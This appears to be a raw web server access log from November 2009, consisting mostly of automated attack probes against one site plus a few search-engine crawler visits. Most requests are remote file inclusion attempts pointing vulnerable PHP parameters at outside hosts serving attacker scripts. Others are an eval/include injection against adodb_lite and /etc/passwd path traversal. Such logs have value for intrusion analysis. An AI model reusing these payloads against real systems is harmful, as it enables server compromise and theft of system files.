85.25.94.14 - - [08/Nov/2009:22:07:18 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://0pop.com/id3.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
85.25.94.14 - - [08/Nov/2009:22:07:18 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://0pop.com/id3.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
85.25.94.14 - - [08/Nov/2009:22:07:52 -0800] "GET /logs/access_090406.log//skin/zero_vote/ask_password.php?dir=http://0pop.com/id3.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
94.79.54.195 - - [08/Nov/2009:22:08:02 -0800] "GET /include/bbs.lib.inc.php?site_path=http://avto-tulun.ru/images/avatars/.source/one.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.79.54.195 - - [08/Nov/2009:22:08:18 -0800] "GET /logs//include/bbs.lib.inc.php?site_path=http://avto-tulun.ru/images/avatars/.source/one.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.79.54.195 - - [08/Nov/2009:22:08:18 -0800] "GET /logs/access_090511.log//include/bbs.lib.inc.php?site_path=http://avto-tulun.ru/images/avatars/.source/one.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.0.54.130 - - [08/Nov/2009:22:08:43 -0800] "GET /logs/access.log//admin/auth!php?xcart_dir=' HTTP/1.1" 404 - "-" "libwww-perl/5.79" "galf.org"
124.0.54.130 - - [08/Nov/2009:22:08:44 -0800] "GET /admin/auth!php?xcart_dir=' HTTP/1.1" 404 - "-" "libwww-perl/5.79" "galf.org"
124.0.54.130 - - [08/Nov/2009:22:08:44 -0800] "GET /logs//admin/auth!php?xcart_dir=' HTTP/1.1" 404 - "-" "libwww-perl/5.79" "galf.org"
204.15.230.189 - - [08/Nov/2009:22:09:19 -0800] "GET /logs/access_090309.log//?_SERVER[DOCUMENT_ROOT]=http://shalomchair.com/log.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
204.15.230.189 - - [08/Nov/2009:22:09:19 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://shalomchair.com/log.txt?? HTTP/1.1" 200 4947 "-" "libwww-perl/5.79" "www.galf.org"
65.55.207.76 - - [08/Nov/2009:22:09:28 -0800] "GET /cendoc/?S=A HTTP/1.1" 200 526 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
85.25.94.14 - - [08/Nov/2009:22:11:09 -0800] "GET /logs/access_090504.log//ask_password.php?dir=http://0pop.com/id3.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
85.25.94.14 - - [08/Nov/2009:22:11:09 -0800] "GET /ask_password.php?dir=http://0pop.com/id3.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
85.25.94.14 - - [08/Nov/2009:22:11:09 -0800] "GET /logs//ask_password.php?dir=http://0pop.com/id3.txt???? HTTP/1.0" 404 - "-" "libwww-perl/5.803" "www.galf.org"
118.220.173.228 - - [08/Nov/2009:22:12:06 -0800] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sypoo.com/sub6/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.25.94.14 - - [08/Nov/2009:22:12:17 -0800] "GET /logs/access_090518.log//ask_password.php?dir=http://0pop.com/id3.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
122.155.5.84 - - [08/Nov/2009:22:12:41 -0800] "GET /logs/access_090622.log%20%20//phphtml.php?htmlclass_path=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [08/Nov/2009:22:12:41 -0800] "GET /logs//phphtml.php?htmlclass_path=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [08/Nov/2009:22:12:41 -0800] "GET /phphtml.php?htmlclass_path=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.220.173.228 - - [08/Nov/2009:22:12:57 -0800] "GET /logs/access_091012.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sypoo.com/sub6/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [08/Nov/2009:22:13:00 -0800] "GET /logs/access_090622.log%20%20//phphtml.php?htmlclass_path=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [08/Nov/2009:22:13:00 -0800] "GET /logs//phphtml.php?htmlclass_path=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [08/Nov/2009:22:13:00 -0800] "GET /phphtml.php?htmlclass_path=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [08/Nov/2009:22:13:02 -0800] "GET /phphtml.php?htmlclass_path=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [08/Nov/2009:22:13:02 -0800] "GET /logs/access_090622.log%20%20//phphtml.php?htmlclass_path=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [08/Nov/2009:22:13:02 -0800] "GET /logs//phphtml.php?htmlclass_path=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.249.65.151 - - [08/Nov/2009:22:13:03 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.galf.org"
122.155.5.84 - - [08/Nov/2009:22:13:06 -0800] "GET /logs/access_090629.log%20%20//phphtml.php?htmlclass_path=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.127.209.27 - - [08/Nov/2009:22:13:09 -0800] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.127.209.27 - - [08/Nov/2009:22:13:09 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.127.209.27 - - [08/Nov/2009:22:13:09 -0800] "GET /logs/access_090713.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.79.54.195 - - [08/Nov/2009:22:13:19 -0800] "GET /include/bbs.lib.inc.php?site_path=http://avto-tulun.ru/images/avatars/.source/one.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.79.54.195 - - [08/Nov/2009:22:13:19 -0800] "GET /logs//include/bbs.lib.inc.php?site_path=http://avto-tulun.ru/images/avatars/.source/one.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.79.54.195 - - [08/Nov/2009:22:13:20 -0800] "GET /logs/access_090511.log//include/bbs.lib.inc.php?site_path=http://avto-tulun.ru/images/avatars/.source/one.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [08/Nov/2009:22:13:26 -0800] "GET /logs/access_090629.log%20%20//phphtml.php?htmlclass_path=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [08/Nov/2009:22:13:28 -0800] "GET /logs/access_090629.log%20%20//phphtml.php?htmlclass_path=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.97.212.185 - - [08/Nov/2009:22:13:30 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.97.212.185 - - [08/Nov/2009:22:13:30 -0800] "GET /logs/access_090928.log%20%20//skin/zero_vote/error.php?dir=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.97.212.185 - - [08/Nov/2009:22:13:30 -0800] "GET /skin/zero_vote/error.php?dir=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.127.209.27 - - [08/Nov/2009:22:13:34 -0800] "GET /logs/access_090713.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.127.209.27 - - [08/Nov/2009:22:13:34 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.127.209.27 - - [08/Nov/2009:22:13:34 -0800] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.97.212.185 - - [08/Nov/2009:22:14:30 -0800] "GET /logs/access_090427.log%20%20//skin/zero_vote/error.php?dir=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
204.15.230.189 - - [08/Nov/2009:22:14:44 -0800] "GET /logs/access_090713.log//?_SERVER[DOCUMENT_ROOT]=http://shalomchair.com/log.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
213.3.26.176 - - [08/Nov/2009:22:14:54 -0800] "GET /logs/access.log%20%20///skin/ggambo7002_board/modify.php?dir=http://paran.joa79.com/_var/member/char_set/idxx.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.25.94.14 - - [08/Nov/2009:22:15:59 -0800] "GET /logs//bbs/skin/zero_vote/ask_password.php?dir=http://0pop.com/id3.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "galf.org"
85.25.94.14 - - [08/Nov/2009:22:15:59 -0800] "GET /bbs/skin/zero_vote/ask_password.php?dir=http://0pop.com/id3.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "galf.org"
85.25.94.14 - - [08/Nov/2009:22:16:00 -0800] "GET /logs/access.log//bbs/skin/zero_vote/ask_password.php?dir=http://0pop.com/id3.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "galf.org"
201.218.228.226 - - [08/Nov/2009:22:17:08 -0800] "GET /modules/TotalCalendar/about.php?inc_dir=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
201.218.228.226 - - [08/Nov/2009:22:17:12 -0800] "GET /logs/modules/TotalCalendar/about.php?inc_dir=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
201.218.228.226 - - [08/Nov/2009:22:17:12 -0800] "GET /logs/access.log%20%20/modules/TotalCalendar/about.php?inc_dir=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
202.30.48.8 - - [08/Nov/2009:22:17:40 -0800] "GET /logs//components/com_virtuemart/errors.php?error=http://www.abruzzobooking.it/mambots/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.30.48.8 - - [08/Nov/2009:22:17:40 -0800] "GET /logs/access_090511.log//components/com_virtuemart/errors.php?error=http://www.abruzzobooking.it/mambots/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.30.48.8 - - [08/Nov/2009:22:17:40 -0800] "GET /components/com_virtuemart/errors.php?error=http://www.abruzzobooking.it/mambots/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.227.134.140 - - [08/Nov/2009:22:18:37 -0800] "GET /logs/access.log%20%20/errors.php?error=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
67.227.134.140 - - [08/Nov/2009:22:18:37 -0800] "GET /errors.php?error=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
67.227.134.140 - - [08/Nov/2009:22:18:37 -0800] "GET /logs/errors.php?error=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
67.227.134.140 - - [08/Nov/2009:22:19:04 -0800] "GET /errors.php?error=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
67.227.134.140 - - [08/Nov/2009:22:19:04 -0800] "GET /logs/errors.php?error=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
67.227.134.140 - - [08/Nov/2009:22:19:04 -0800] "GET /logs/access.log/errors.php?error=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
209.97.212.185 - - [08/Nov/2009:22:20:15 -0800] "GET /logs/access_090928.log//skin/zero_vote/error.php?dir=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.84.148.109 - - [08/Nov/2009:22:20:41 -0800] "GET /?p=./../../../../../../../../etc/passwd%00 HTTP/1.1" 200 1048 "-" "-" "www.galf.org"
88.84.148.109 - - [08/Nov/2009:22:20:42 -0800] "GET /?p=./../../../../../../../../etc/passwd HTTP/1.1" 200 1048 "-" "-" "www.galf.org"
209.97.212.185 - - [08/Nov/2009:22:20:45 -0800] "GET /logs/access_090427.log//skin/zero_vote/error.php?dir=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.25.94.14 - - [08/Nov/2009:22:21:04 -0800] "GET /logs/access_090518.log%20//ask_password.php?dir=http://0pop.com/id3.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
67.227.134.140 - - [08/Nov/2009:22:21:11 -0800] "GET /logs/access.log/errors.php?error=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
67.227.134.140 - - [08/Nov/2009:22:21:11 -0800] "GET /logs/errors.php?error=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
67.227.134.140 - - [08/Nov/2009:22:21:11 -0800] "GET /errors.php?error=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
82.193.15.3 - - [08/Nov/2009:22:21:44 -0800] "GET /logs///bbs//skin/zero_vote/ask_password.php?dir=http://www.sypoo.com/sub6/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
201.218.228.226 - - [08/Nov/2009:22:22:15 -0800] "GET /logs/access_090914.log%20%20//paginedinamiche/main.php?pagina=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
201.218.228.226 - - [08/Nov/2009:22:22:15 -0800] "GET /logs//paginedinamiche/main.php?pagina=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
201.218.228.226 - - [08/Nov/2009:22:22:15 -0800] "GET /paginedinamiche/main.php?pagina=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.103.24.110 - - [08/Nov/2009:22:24:31 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=%20http://buntutkud4.fileave.com/fx29id1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
61.103.24.110 - - [08/Nov/2009:22:25:11 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=%20http://buntutkud4.fileave.com/fx29id1.txt? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.galf.org"
61.103.24.110 - - [08/Nov/2009:22:25:27 -0800] "GET /logs/access_090810.log///?_SERVER[DOCUMENT_ROOT]=%20http://buntutkud4.fileave.com/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
98.129.217.53 - - [08/Nov/2009:22:25:55 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://mobilemagic.sanook.com/cache/fx29id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
98.129.217.53 - - [08/Nov/2009:22:25:55 -0800] "GET /logs/access_090907.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://mobilemagic.sanook.com/cache/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
98.129.217.53 - - [08/Nov/2009:22:25:55 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://mobilemagic.sanook.com/cache/fx29id1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
98.129.217.53 - - [08/Nov/2009:22:25:58 -0800] "GET /logs/access_090323.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://mobilemagic.sanook.com/cache/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.36.9.1 - - [08/Nov/2009:22:26:17 -0800] "GET /logs/access_090706.log//songinfo.php?commonpath=http://katrok.fileave.com/a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.36.9.1 - - [08/Nov/2009:22:26:17 -0800] "GET /songinfo.php?commonpath=http://katrok.fileave.com/a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.36.9.1 - - [08/Nov/2009:22:26:17 -0800] "GET /logs//songinfo.php?commonpath=http://katrok.fileave.com/a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.36.9.1 - - [08/Nov/2009:22:26:29 -0800] "GET /logs/access_090706.log//songinfo.php?commonpath=http://katrok.fileave.com/a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.36.9.1 - - [08/Nov/2009:22:26:29 -0800] "GET /songinfo.php?commonpath=http://katrok.fileave.com/a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.36.9.1 - - [08/Nov/2009:22:26:29 -0800] "GET /logs//songinfo.php?commonpath=http://katrok.fileave.com/a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
201.218.228.226 - - [08/Nov/2009:22:26:45 -0800] "GET /logs/access_090629.log%20%20//paginedinamiche/main.php?pagina=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
95.108.150.235 - - [08/Nov/2009:22:27:17 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.galf.org"
95.108.150.235 - - [08/Nov/2009:22:27:18 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; H)" "galf.org"
95.108.150.235 - - [08/Nov/2009:22:27:19 -0800] "GET / HTTP/1.1" 200 1048 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.galf.org"
95.108.150.235 - - [08/Nov/2009:22:27:20 -0800] "GET / HTTP/1.1" 200 1048 "-" "Yandex/1.01.001 (compatible; Win16; H)" "galf.org"
95.108.150.235 - - [08/Nov/2009:22:27:21 -0800] "GET / HTTP/1.1" 200 1048 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.galf.org"
95.108.150.235 - - [08/Nov/2009:22:27:24 -0800] "GET / HTTP/1.1" 200 1048 "-" "Yandex/1.01.001 (compatible; Win16; H)" "galf.org"
77.221.130.17 - - [08/Nov/2009:22:28:04 -0800] "GET /logs/access_090907.log%20%20//?_SERVER[DOCUMENT_ROOT]=%20http://buntutkud4.fileave.com/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [08/Nov/2009:22:28:04 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=%20http://buntutkud4.fileave.com/fx29id1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [08/Nov/2009:22:28:05 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=%20http://buntutkud4.fileave.com/fx29id1.txt? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [08/Nov/2009:22:28:11 -0800] "GET /logs/access_090323.log%20%20//?_SERVER[DOCUMENT_ROOT]=%20http://buntutkud4.fileave.com/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [08/Nov/2009:22:28:24 -0800] "GET /logs/access_090907.log%20%20//?_SERVER[DOCUMENT_ROOT]=%20http://buntutkud4.fileave.com/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [08/Nov/2009:22:28:24 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=%20http://buntutkud4.fileave.com/fx29id1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [08/Nov/2009:22:28:24 -0800] "GET /logs/access_090323.log%20%20//?_SERVER[DOCUMENT_ROOT]=%20http://buntutkud4.fileave.com/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [08/Nov/2009:22:28:24 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=%20http://buntutkud4.fileave.com/fx29id1.txt? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
87.139.66.104 - - [08/Nov/2009:22:28:59 -0800] "GET /admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://gminamakow.info//dmdocuments/mambo?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.galf.org"
87.139.66.104 - - [08/Nov/2009:22:29:00 -0800] "GET /logs/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://gminamakow.info//dmdocuments/mambo?? HTTP/1.1" 404 - "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.galf.org"
94.79.54.195 - - [08/Nov/2009:22:29:11 -0800] "GET /modules/errors.php?error=http://avto-tulun.ru/images/avatars/.source/one.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.79.54.195 - - [08/Nov/2009:22:29:11 -0800] "GET /logs//modules/errors.php?error=http://avto-tulun.ru/images/avatars/.source/one.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.79.54.195 - - [08/Nov/2009:22:29:11 -0800] "GET /logs/access_090316.log//modules/errors.php?error=http://avto-tulun.ru/images/avatars/.source/one.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.97.212.185 - - [08/Nov/2009:22:29:17 -0800] "GET /logs/access_090504.log//skin/zero_vote/error.php?dir=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.97.212.185 - - [08/Nov/2009:22:29:17 -0800] "GET /logs/access_090615.log//skin/zero_vote/error.php?dir=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [08/Nov/2009:22:31:34 -0800] "GET /index2.php?option=com_virtuemart&page&id=94&category_id=&mosConfig_absolute_path=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [08/Nov/2009:22:31:34 -0800] "GET /logs/access_090914.log%20%20//index2.php?option=com_virtuemart&page&id=94&category_id=&mosConfig_absolute_path=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [08/Nov/2009:22:31:34 -0800] "GET /logs//index2.php?option=com_virtuemart&page&id=94&category_id=&mosConfig_absolute_path=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [08/Nov/2009:22:31:34 -0800] "GET /logs/access_090914.log%20%20//index2.php?option=com_virtuemart&page&id=94&category_id=&mosConfig_absolute_path=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [08/Nov/2009:22:31:34 -0800] "GET /logs//index2.php?option=com_virtuemart&page&id=94&category_id=&mosConfig_absolute_path=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [08/Nov/2009:22:31:34 -0800] "GET /index2.php?option=com_virtuemart&page&id=94&category_id=&mosConfig_absolute_path=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [08/Nov/2009:22:31:34 -0800] "GET /index2.php?option=com_virtuemart&page&id=94&category_id=&mosConfig_absolute_path=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [08/Nov/2009:22:31:34 -0800] "GET /logs/access_090914.log%20%20//index2.php?option=com_virtuemart&page&id=94&category_id=&mosConfig_absolute_path=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [08/Nov/2009:22:31:34 -0800] "GET /logs//index2.php?option=com_virtuemart&page&id=94&category_id=&mosConfig_absolute_path=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.172.33.230 - - [08/Nov/2009:22:32:42 -0800] "GET /logs/access_090511.log//include/mail.inc.php?skin_board_path=http://www.kzk.ru/file/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.172.33.230 - - [08/Nov/2009:22:32:42 -0800] "GET /include/mail.inc.php?skin_board_path=http://www.kzk.ru/file/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.172.33.230 - - [08/Nov/2009:22:32:42 -0800] "GET /logs//include/mail.inc.php?skin_board_path=http://www.kzk.ru/file/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
201.218.228.226 - - [08/Nov/2009:22:33:03 -0800] "GET /logs/access.log/modules/TotalCalendar/about.php?inc_dir=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
69.94.125.100 - - [08/Nov/2009:22:33:23 -0800] "GET /logs/access_091012.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kb27.co.kr/bbs///data/idalb.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
69.94.125.100 - - [08/Nov/2009:22:33:23 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kb27.co.kr/bbs///data/idalb.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
69.94.125.100 - - [08/Nov/2009:22:33:24 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kb27.co.kr/bbs///data/idalb.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
98.129.217.53 - - [08/Nov/2009:22:33:53 -0800] "GET /logs/access_090907.log//?_SERVER[DOCUMENT_ROOT]=http://mobilemagic.sanook.com/cache/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
98.129.217.53 - - [08/Nov/2009:22:33:59 -0800] "GET /logs/access_090323.log//?_SERVER[DOCUMENT_ROOT]=http://mobilemagic.sanook.com/cache/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.6.232.171 - - [08/Nov/2009:22:34:15 -0800] "GET /logs/access_091012.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://0pop.com/id3.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
64.6.232.171 - - [08/Nov/2009:22:34:15 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://0pop.com/id3.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
